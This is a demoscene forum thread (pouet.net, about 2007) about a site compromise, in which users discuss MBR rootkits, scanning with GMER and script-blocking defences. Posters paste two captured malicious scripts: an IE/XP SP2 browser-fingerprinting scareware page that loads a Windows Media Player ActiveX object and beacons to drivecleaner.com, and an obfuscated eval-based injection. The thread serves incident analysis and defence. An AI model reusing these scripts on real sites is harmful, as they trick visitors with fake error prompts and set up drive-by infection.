POUET.NET is hacked / infected with a javascript worm
category: general [glöplog]
ryg: thanks for telling that. i think neither my work pc nor my home pc are infected in that case. so, still leaves me there wondering how the hell the pain sites was hacked then?
  
i was pretty shocked to see some suspicious output by GMER, but later i figured out that DISABLING antivir is not enough, you need to uninstall it. after that GMER could not find anything. 
a listing of a "positive" GMER output would have been quite helpful, i suffered two late hours of painful doubt. checking the bootblock would not help in my case because its a grub.
  
a listing of a "positive" GMER output would have been quite helpful, i suffered two late hours of painful doubt. checking the bootblock would not help in my case because its a grub.
gmer lists all the drivers hooking under the windows kernel, like rootkits but also antivirus, cd emulators like daemon tools, encryption layers like drivecrypt, disk imaging tools like true image, etc...
  
yeh, but i actually tells if it finds a known rootkit, or does it just lust and let the user suffer from doubts? :)
  
it marks everything truly suspicious as red.
  
By the way, for those who got the MBR rootkit in, you need to use fixmbr only from a CD and not from the recovery console booted from the hdd. (For obvious reasons, the rootkit does not want you to overwrite it ;)
  
A friend of mine helped me analyzing the different MBRs and they all seem to be "normal"... also, i can't find anything in sector 60-62, so there's probably no MBR-Rootkit (and hopefully no other rootkit) - Did anybody notice changes in his system (Popups etc.) which are stated on different websites?
  
It was the valves-wholesale guy!
  
hmm it works only on winxp sp2?
strange stuffs..
  
Code:
	is_XP_SP2     = (navigator.userAgent.indexOf("SV1") != -1) || (navigator.appMinorVersion && (navigator.appMinorVersion.indexOf('SP2') != -1));
	is_IE=false;
	if (navigator.appName.toLowerCase()=='microsoft internet explorer')
	{
		if (navigator.userAgent.toLowerCase().indexOf('opera')<=0) 	{	is_IE=true;	}
	}	
	
is_opera  = (navigator.userAgent.indexOf("opera") != -1);
is_mac 	  = (navigator.userAgent.indexOf("mac") != -1);
is_mac_ie = (is_IE && is_mac);
is_win_ie = (is_IE && !is_mac);
is_gecko  = (navigator.product == "Gecko");
function OkClicked(){
	}
if(is_XP_SP2) {
	var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
	document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>");
}
function onLoadPage()
{
	bResult = confirm('Multiple System Errors Detected. Click OK To Fix');
	if (bResult)
	{
		OkClicked();
		document.location.href("");
	}
}
var redirect_ad = 'keyin_tbn_nl_en';
var redirect_link    = 'keyin';
function check_cookies()
{
	document.cookie="foo=test; path=/; expires=Mon, 31-Dec-2007 00:00:00 GMT";
	myVar = getCookie("foo");
	if (myVar == "test")
	{
		Img = new Image();
		Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=1';
	}
	else
	{
		Img = new Image();
		Img.src = 'http://drivecleaner.com/.freeware/test.php?cookie=2';
	}
}
function getCookie(name) {
	var cookie = " " + document.cookie;
	var search = " " + name + "=";
	var setStr = null;
	var offset = 0;
	var end = 0;
	if (cookie.length > 0) {
		offset = cookie.indexOf(search);
		if (offset != -1) {
			offset += search.length;
			end = cookie.indexOf(";", offset)
			if (end == -1) {
				end = cookie.length;
			}
			setStr = unescape(cookie.substring(offset, end));
		}
	}
	return(setStr);
}
check_cookies();
strange stuffs..
What's that ?
Checking the user agent is just plain wrong. Browsers have been faking it for years!
The classId 6BF52A52-394A-11D3-B153-00C04F79FAA6 refers to Windows Media Player 7 and there seem to be a bunch of exploit with it to load/executre arbitrray files
  
Checking the user agent is just plain wrong. Browsers have been faking it for years!
The classId 6BF52A52-394A-11D3-B153-00C04F79FAA6 refers to Windows Media Player 7 and there seem to be a bunch of exploit with it to load/executre arbitrray files
I mean, where did you get that script ?
  
When I was redirected to: redirect to http://e.pepato.org/e/adsr.php?t=0 it turned out to be someone had hacked the server and altered to webpage with the following code:
Pretty annoying, but easy to fix.
  
Code:
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else 
      if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>Pretty annoying, but easy to fix.
Well, that's why I use firefox with no-script installed. Nobody getting through that way without my permission!
  
don't need Firefox and an extension to disable scripting, but hey whatever makes you feel safe.
Even in IE scripting can be disabled.
  
Even in IE scripting can be disabled.
Does that MBR faggotery affect GRUB or is it just the windows MBR thingy?
  
Hey, IE's anti script is not under your direct on-the-fly control like NoScript is. NoScript does alot more than JavaScript too, look it up. It's one of my favourite damage control tools for web browsing, because it's fast, not annoying, and easy to use.
  
Oh, and I'm not Winblowz either...
  
arfink, you must be very rad
  
Well, maybe it would be simpler just to block all Javascript which had a call to 'eval' in it.
  
Lord Graga: some antivirus do check that for you by parsing every HTTP traffic (i'm using Kaspersky for example).
  
Lord Graga: or Function( "somecode") or setTimeout( "somecode", delay ) or setInterval( "somecode", delay )
  
@all: thanks for this information
I'm not infected
I use FF with QuickJava Button
NoScript sometimes causes task freezes on FF
  
I'm not infected
I use FF with QuickJava Button
NoScript sometimes causes task freezes on FF
@ClassicCan,
got this, too. Posted in "fix me beautiful". Which Server? Was not able to find it that time.
  
got this, too. Posted in "fix me beautiful". Which Server? Was not able to find it that time.
p01: who doesn't use that in WEB2.0 dev? =)
  
confused:
http://pouet.net/topic.php?which=1024&page=378
first time I got redirected was 17.01.2007 (see link) and nobody had any reaction here.
stijn also had the same problem. Isn't it the same piece of code?
Actually found nothing with gmer.
  
http://pouet.net/topic.php?which=1024&page=378
first time I got redirected was 17.01.2007 (see link) and nobody had any reaction here.
stijn also had the same problem. Isn't it the same piece of code?
Actually found nothing with gmer.
.jpg)














